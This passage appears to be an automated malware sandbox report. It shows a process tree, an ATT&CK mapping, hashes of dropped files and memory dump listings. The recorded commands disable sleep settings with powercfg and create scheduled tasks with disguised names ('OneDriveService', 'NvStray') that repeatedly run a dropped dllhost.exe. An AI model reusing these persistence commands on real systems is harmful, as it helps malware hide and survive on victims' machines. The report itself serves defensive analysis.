- - C:\Windows\SysWOW64\powercfg.exe
    powercfg /x -hibernate-timeout-ac 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2176
- - C:\Windows\SysWOW64\powercfg.exe
    powercfg /x -hibernate-timeout-dc 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1940
- - C:\Windows\SysWOW64\powercfg.exe
    powercfg /x -standby-timeout-ac 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3608
- - C:\Windows\SysWOW64\powercfg.exe
    powercfg /x -standby-timeout-dc 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4668
- - C:\Windows\SysWOW64\powercfg.exe
    powercfg /hibernate off
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2432
- - C:\Windows\SysWOW64\schtasks.exe
    SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "ActivationRule" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f
    3⤵
    - Creates scheduled task(s)
    PID:4936
- C:\Windows\SysWOW64\cmd.exe
  "cmd.exe" /C echo pИЕвyъюzЙjK & SCHTASKS /CREATE /SC HOURLY /TN "NvStray" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo КНЬф5ЯСWLdb
  2⤵
  PID:4088
- C:\Windows\SysWOW64\cmd.exe
  "cmd.exe" /C echo aМУтmDKТГXmj & SCHTASKS /CREATE /SC HOURLY /TN "OneDriveService" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo ц
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4760

C:\Windows\SysWOW64\schtasks.exe
SCHTASKS /CREATE /SC HOURLY /TN "OneDriveService" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f
1⤵
- Creates scheduled task(s)
PID:4648

C:\Windows\SysWOW64\schtasks.exe
SCHTASKS /CREATE /SC HOURLY /TN "NvStray" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f
1⤵
- Creates scheduled task(s)
PID:1476

C:\ProgramData\Dllhost\dllhost.exe
C:\ProgramData\Dllhost\dllhost.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3472

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Dllhost\dllhost.exe

Filesize
72KB

MD5
a9cf879c75c93afadc653d9d7fbc5db8

SHA1
a61966de75b05a15bce599d958f89400986956ed

SHA256
3fdc578a50b1db8d12e2e66c94b3cb5711874615a1c8f01ae9f4c93255a029c2

SHA512
3ad5d75d2823c72fc6350403ab580bec64551d3199ecbd5d2a44b07e50ca78ceed7bba991c070fccef95cde1b7975ae597cd628ecfb03dd9dd801fc8443019c6

Download Submit
C:\ProgramData\Dllhost\dllhost.exe

Filesize
72KB

MD5
a9cf879c75c93afadc653d9d7fbc5db8

SHA1
a61966de75b05a15bce599d958f89400986956ed

SHA256
3fdc578a50b1db8d12e2e66c94b3cb5711874615a1c8f01ae9f4c93255a029c2

SHA512
3ad5d75d2823c72fc6350403ab580bec64551d3199ecbd5d2a44b07e50ca78ceed7bba991c070fccef95cde1b7975ae597cd628ecfb03dd9dd801fc8443019c6

Download Submit
C:\ProgramData\Dllhost\dllhost.exe

Filesize
72KB

MD5
a9cf879c75c93afadc653d9d7fbc5db8

SHA1
a61966de75b05a15bce599d958f89400986956ed

SHA256
3fdc578a50b1db8d12e2e66c94b3cb5711874615a1c8f01ae9f4c93255a029c2

SHA512
3ad5d75d2823c72fc6350403ab580bec64551d3199ecbd5d2a44b07e50ca78ceed7bba991c070fccef95cde1b7975ae597cd628ecfb03dd9dd801fc8443019c6

Download Submit
C:\ProgramData\HostData\logs.uce

Filesize
227B

MD5
23a8f225ed19bebf3c4dfc8a88872d42

SHA1
07ec41f9534f229ba234278c93b9c98cb391c1bf

SHA256
51a008bdad6d1d859bcd42815566bcd89370c254d1b66760fc0a86887d197ba8

SHA512
812d9262cb371929f2d71a32c3dca21e4433de7b5afda68c7beb8f0c3c339b7fead9712685c6c98aa102258658c93ed72a7a5d9c00dc22445109d94ddf8dfc52

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
1c19c16e21c97ed42d5beabc93391fc5

SHA1
8ad83f8e0b3acf8dfbbf87931e41f0d664c4df68

SHA256
1bcd97396c83babfe6c5068ba590d7a3f8b70e72955a9d1e4070648e404cbf05

SHA512
7d18776d8f649b3d29c182ff03efc6cea8b527542ee55304980f24577aae8b64e37044407776e220984346c3998ace5f8853afa58c8b38407482a728e9495e0c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
44KB

MD5
7247129cd0644457905b7d6bf17fd078

SHA1
dbf9139b5a1b72141f170d2eae911bbbe7e128c8

SHA256
dfa6e0d79449f29310b2a0400dc7fa5a3a6b08182233147a81902d1f80a0f8e4

SHA512
9b1ebd7fe485811f10ec02778d90a7f7eccafa0231027b640b94eaed8408107051da7fcc4f17a9aa0eef900fa2595f44be7fd115331fb6da9b10076f5fcf87e0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
44KB

MD5
7247129cd0644457905b7d6bf17fd078

SHA1
dbf9139b5a1b72141f170d2eae911bbbe7e128c8

SHA256
dfa6e0d79449f29310b2a0400dc7fa5a3a6b08182233147a81902d1f80a0f8e4

SHA512
9b1ebd7fe485811f10ec02778d90a7f7eccafa0231027b640b94eaed8408107051da7fcc4f17a9aa0eef900fa2595f44be7fd115331fb6da9b10076f5fcf87e0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
44KB

MD5
7247129cd0644457905b7d6bf17fd078

SHA1
dbf9139b5a1b72141f170d2eae911bbbe7e128c8

SHA256
dfa6e0d79449f29310b2a0400dc7fa5a3a6b08182233147a81902d1f80a0f8e4

SHA512
9b1ebd7fe485811f10ec02778d90a7f7eccafa0231027b640b94eaed8408107051da7fcc4f17a9aa0eef900fa2595f44be7fd115331fb6da9b10076f5fcf87e0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
44KB

MD5
7247129cd0644457905b7d6bf17fd078

SHA1
dbf9139b5a1b72141f170d2eae911bbbe7e128c8

SHA256
dfa6e0d79449f29310b2a0400dc7fa5a3a6b08182233147a81902d1f80a0f8e4

SHA512
9b1ebd7fe485811f10ec02778d90a7f7eccafa0231027b640b94eaed8408107051da7fcc4f17a9aa0eef900fa2595f44be7fd115331fb6da9b10076f5fcf87e0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
45KB

MD5
0b5d94d20be9eecbaed3dddd04143f07

SHA1
c677d0355f4cc7301075a554adc889bce502e15a

SHA256
3c6f74219d419accdd3de0d14fa46ff290fd430eddcc5352deddd7de59b4928c

SHA512
395e5d0f28819f773b8d53363b7df73cc976124d1accce104390fdb3f5ebf57d8bb357e616910c03e1a9d67985704592640e442bd637009e32086bb1b2088916

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
45KB

MD5
0b5d94d20be9eecbaed3dddd04143f07

SHA1
c677d0355f4cc7301075a554adc889bce502e15a

SHA256
3c6f74219d419accdd3de0d14fa46ff290fd430eddcc5352deddd7de59b4928c

SHA512
395e5d0f28819f773b8d53363b7df73cc976124d1accce104390fdb3f5ebf57d8bb357e616910c03e1a9d67985704592640e442bd637009e32086bb1b2088916

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
45KB

MD5
0b5d94d20be9eecbaed3dddd04143f07

SHA1
c677d0355f4cc7301075a554adc889bce502e15a

SHA256
3c6f74219d419accdd3de0d14fa46ff290fd430eddcc5352deddd7de59b4928c

SHA512
395e5d0f28819f773b8d53363b7df73cc976124d1accce104390fdb3f5ebf57d8bb357e616910c03e1a9d67985704592640e442bd637009e32086bb1b2088916

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
45KB

MD5
0b5d94d20be9eecbaed3dddd04143f07

SHA1
c677d0355f4cc7301075a554adc889bce502e15a

SHA256
3c6f74219d419accdd3de0d14fa46ff290fd430eddcc5352deddd7de59b4928c

SHA512
395e5d0f28819f773b8d53363b7df73cc976124d1accce104390fdb3f5ebf57d8bb357e616910c03e1a9d67985704592640e442bd637009e32086bb1b2088916

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
5449ab490514a205347c71b25073c31b

SHA1
65a4c17ac21d4555083dc4efc22fc3226f7d65e1

SHA256
d6ea595aa6ba55100261e1de390ab49436842f61ad603364295c8771314051e8

SHA512
4188a6aeec0162bf32f737f107c64ab6f100ed2b15adbb53f1d3e202164b7db6d416fe6d69e7ac7879cda165880202994bb1479056abcfec1f10e0663709e32f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
fcb5bf26072c91263b27d770f59b9a85

SHA1
f998a355200438fc71e17e966ac6739aeb0a81fb

SHA256
32906c0a06bfca5ecb9f6dfae62663e24d0d3e023895aa0999f4d1b8da0d9f30

SHA512
8d42ebc9564a99488e88cedd52277be7814a5ca94cad4bd08487bcc1718774dfb32b4a27897cc23fdbd1864806462632fc0d65557d740ccb5ea1de6223d69831

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
596bca2eab85c3116b9bc9df4c514aa6

SHA1
9df9f15443b93c8e448817ac906781d15315b74e

SHA256
efa65d4fb526d6f2d7621e5c9df09971c81ca2c5940584e7a07ec1d882a6a7c4

SHA512
0b60d9b5f80950b196d4c9de921dcadca9f69727a19372a75cd9d59d714187068d5a8d72a535eb1de88e3c5d7072c99d8fb86ff10a3899aa2de39b7b808b1e1c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
4e70c38a210044fe23f6e571c1210b7b

SHA1
a0cfdaf50ef584d2174b9ae30d4a0bb3b4bba315

SHA256
2be516dacce1a54e48dc850b47e1f1a4724a187ca471bb9121c0e1f1ad832ab0

SHA512
44c378e2959d3594a9b7e7688da33ff7793fe04484485460b139e85373a1941d93ad6e9b3a28841b657cb87d9aa7e56c7f56ed34717490c86df1bd0485462d85

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
596bca2eab85c3116b9bc9df4c514aa6

SHA1
9df9f15443b93c8e448817ac906781d15315b74e

SHA256
efa65d4fb526d6f2d7621e5c9df09971c81ca2c5940584e7a07ec1d882a6a7c4

SHA512
0b60d9b5f80950b196d4c9de921dcadca9f69727a19372a75cd9d59d714187068d5a8d72a535eb1de88e3c5d7072c99d8fb86ff10a3899aa2de39b7b808b1e1c

Download Submit
memory/1400-230-0x00000000073F0000-0x0000000007A18000-memory.dmp

Filesize
6.2MB

Download
memory/1400-254-0x00000000073C0000-0x00000000073DC000-memory.dmp

Filesize
112KB

Download
memory/1400-515-0x00000000095E0000-0x00000000095FA000-memory.dmp

Filesize
104KB

Download
memory/1400-248-0x00000000071C0000-0x00000000071E2000-memory.dmp

Filesize
136KB

Download
memory/1400-250-0x0000000007260000-0x00000000072C6000-memory.dmp

Filesize
408KB

Download
memory/1400-259-0x0000000008290000-0x0000000008306000-memory.dmp

Filesize
472KB

Download
memory/1400-290-0x0000000009100000-0x000000000911E000-memory.dmp

Filesize
120KB

Download
memory/1400-288-0x0000000009140000-0x0000000009173000-memory.dmp

Filesize
204KB

Download
memory/1400-225-0x0000000004AA0000-0x0000000004AD6000-memory.dmp

Filesize
216KB

Download
memory/1400-300-0x00000000091A0000-0x0000000009245000-memory.dmp

Filesize
660KB

Download
memory/1400-251-0x0000000007C50000-0x0000000007FA0000-memory.dmp

Filesize
3.3MB

Download
memory/1400-310-0x0000000009640000-0x00000000096D4000-memory.dmp

Filesize
592KB

Download
memory/1400-255-0x0000000008440000-0x000000000848B000-memory.dmp

Filesize
300KB

Download
memory/1400-520-0x00000000095D0000-0x00000000095D8000-memory.dmp

Filesize
32KB

Download
memory/1468-1157-0x0000000007980000-0x0000000007CD0000-memory.dmp

Filesize
3.3MB

Download
memory/2656-157-0x00000000073B0000-0x0000000007442000-memory.dmp

Filesize
584KB

Download
memory/2656-154-0x0000000077770000-0x00000000778FE000-memory.dmp

Filesize
1.6MB

Download
memory/2656-176-0x0000000077770000-0x00000000778FE000-memory.dmp

Filesize
1.6MB

Download
memory/2656-177-0x0000000077770000-0x00000000778FE000-memory.dmp

Filesize
1.6MB

Download
memory/2656-178-0x0000000077770000-0x00000000778FE000-memory.dmp

Filesize
1.6MB

Download
memory/2656-179-0x0000000077770000-0x00000000778FE000-memory.dmp

Filesize
1.6MB

Download
memory/2656-180-0x0000000077770000-0x00000000778FE000-memory.dmp

Filesize
1.6MB

Download
memory/2656-181-0x0000000077770000-0x00000000778FE000-memory.dmp

Filesize
1.6MB

Download
memory/2656-182-0x0000000077770000-0x00000000778FE000-memory.dmp

Filesize
1.6MB

Download
memory/2656-120-0x0000000077770000-0x00000000778FE000-memory.dmp

Filesize
1.6MB

Download
memory/2656-121-0x0000000077770000-0x00000000778FE000-memory.dmp

Filesize
1.6MB

Download
memory/2656-122-0x0000000077770000-0x00000000778FE000-memory.dmp

Filesize
1.6MB

Download
memory/2656-123-0x0000000077770000-0x00000000778FE000-memory.dmp

Filesize
1.6MB

Download
memory/2656-124-0x0000000077770000-0x00000000778FE000-memory.dmp

Filesize
1.6MB

Download
memory/2656-125-0x0000000077770000-0x00000000778FE000-memory.dmp

Filesize
1.6MB

Download
memory/2656-174-0x0000000007450000-0x00000000074B6000-memory.dmp

Filesize
408KB

Download
memory/2656-173-0x0000000002990000-0x000000000299A000-memory.dmp

Filesize
40KB

Download
memory/2656-172-0x0000000077770000-0x00000000778FE000-memory.dmp

Filesize
1.6MB

Download
memory/2656-171-0x0000000077770000-0x00000000778FE000-memory.dmp

Filesize
1.6MB

Download
memory/2656-170-0x0000000077770000-0x00000000778FE000-memory.dmp

Filesize
1.6MB

Download
memory/2656-169-0x0000000077770000-0x00000000778FE000-memory.dmp

Filesize
1.6MB

Download
memory/2656-168-0x0000000077770000-0x00000000778FE000-memory.dmp

Filesize
1.6MB

Download
memory/2656-167-0x0000000077770000-0x00000000778FE000-memory.dmp

Filesize
1.6MB

Download
memory/2656-166-0x0000000077770000-0x00000000778FE000-memory.dmp

Filesize
1.6MB

Download
memory/2656-165-0x0000000077770000-0x00000000778FE000-memory.dmp

Filesize
1.6MB

Download
memory/2656-164-0x0000000077770000-0x00000000778FE000-memory.dmp

Filesize
1.6MB

Download
memory/2656-163-0x0000000077770000-0x00000000778FE000-memory.dmp

Filesize
1.6MB

Download
memory/2656-162-0x0000000077770000-0x00000000778FE000-memory.dmp

Filesize
1.6MB

Download
memory/2656-161-0x0000000077770000-0x00000000778FE000-memory.dmp

Filesize
1.6MB

Download
memory/2656-158-0x0000000077770000-0x00000000778FE000-memory.dmp

Filesize
1.6MB

Download
memory/2656-126-0x0000000077770000-0x00000000778FE000-memory.dmp

Filesize
1.6MB

Download
memory/2656-127-0x0000000077770000-0x00000000778FE000-memory.dmp

Filesize
1.6MB

Download
memory/2656-128-0x0000000077770000-0x00000000778FE000-memory.dmp

Filesize
1.6MB

Download
memory/2656-129-0x0000000077770000-0x00000000778FE000-memory.dmp

Filesize
1.6MB

Download
memory/2656-130-0x0000000077770000-0x00000000778FE000-memory.dmp

Filesize
1.6MB

Download
memory/2656-131-0x0000000077770000-0x00000000778FE000-memory.dmp

Filesize
1.6MB

Download
memory/2656-132-0x0000000077770000-0x00000000778FE000-memory.dmp

Filesize
1.6MB

Download
memory/2656-133-0x0000000077770000-0x00000000778FE000-memory.dmp

Filesize
1.6MB

Download
memory/2656-134-0x0000000077770000-0x00000000778FE000-memory.dmp

Filesize
1.6MB

Download
memory/2656-135-0x0000000077770000-0x00000000778FE000-memory.dmp

Filesize
1.6MB

Download
memory/2656-136-0x0000000077770000-0x00000000778FE000-memory.dmp

Filesize
1.6MB

Download
memory/2656-160-0x0000000077770000-0x00000000778FE000-memory.dmp

Filesize
1.6MB

Download
memory/2656-137-0x0000000077770000-0x00000000778FE000-memory.dmp

Filesize
1.6MB

Download
memory/2656-138-0x0000000077770000-0x00000000778FE000-memory.dmp

Filesize
1.6MB

Download
memory/2656-139-0x0000000077770000-0x00000000778FE000-memory.dmp

Filesize
1.6MB

Download
memory/2656-159-0x0000000077770000-0x00000000778FE000-memory.dmp

Filesize
1.6MB

Download
memory/2656-119-0x0000000077770000-0x00000000778FE000-memory.dmp

Filesize
1.6MB

Download
memory/2656-156-0x0000000007810000-0x0000000007D0E000-memory.dmp

Filesize
5.0MB

Download
memory/2656-155-0x0000000077770000-0x00000000778FE000-memory.dmp

Filesize
1.6MB

Download
memory/2656-175-0x0000000077770000-0x00000000778FE000-memory.dmp

Filesize
1.6MB

Download
memory/2656-151-0x0000000077770000-0x00000000778FE000-memory.dmp

Filesize
1.6MB

Download
memory/2656-153-0x0000000077770000-0x00000000778FE000-memory.dmp

Filesize
1.6MB

Download
memory/2656-152-0x00000000005B0000-0x00000000005D6000-memory.dmp

Filesize
152KB

Download
memory/2656-150-0x0000000077770000-0x00000000778FE000-memory.dmp

Filesize
1.6MB

Download
memory/2656-149-0x0000000077770000-0x00000000778FE000-memory.dmp

Filesize
1.6MB

Download
memory/2656-148-0x0000000077770000-0x00000000778FE000-memory.dmp

Filesize
1.6MB

Download
memory/2656-140-0x0000000077770000-0x00000000778FE000-memory.dmp

Filesize
1.6MB

Download
memory/2656-147-0x0000000077770000-0x00000000778FE000-memory.dmp

Filesize
1.6MB

Download
memory/2656-141-0x0000000077770000-0x00000000778FE000-memory.dmp

Filesize
1.6MB

Download
memory/2656-142-0x0000000077770000-0x00000000778FE000-memory.dmp

Filesize
1.6MB

Download
memory/2656-144-0x0000000077770000-0x00000000778FE000-memory.dmp

Filesize
1.6MB

Download
memory/2656-146-0x0000000077770000-0x00000000778FE000-memory.dmp

Filesize
1.6MB

Download
memory/2656-145-0x0000000077770000-0x00000000778FE000-memory.dmp

Filesize
1.6MB

Download
memory/2656-143-0x0000000077770000-0x00000000778FE000-memory.dmp

Filesize
1.6MB

Download
memory/3488-666-0x0000000000FE0000-0x0000000000FFC000-memory.dmp

Filesize
112KB

Download
memory/4180-184-0x0000000077770000-0x00000000778FE000-memory.dmp

Filesize
1.6MB

Download
memory/4180-188-0x0000000077770000-0x00000000778FE000-memory.dmp

Filesize
1.6MB

Download
memory/4180-187-0x0000000077770000-0x00000000778FE000-memory.dmp

Filesize
1.6MB

Download
memory/4180-186-0x0000000077770000-0x00000000778FE000-memory.dmp

Filesize
1.6MB

Download
memory/4180-185-0x0000000077770000-0x00000000778FE000-memory.dmp

Filesize
1.6MB

Download
memory/4612-1300-0x0000000009D50000-0x0000000009DF5000-memory.dmp

Filesize
660KB

Download
memory/4612-1190-0x0000000008CE0000-0x0000000008D2B000-memory.dmp

Filesize
300KB

Download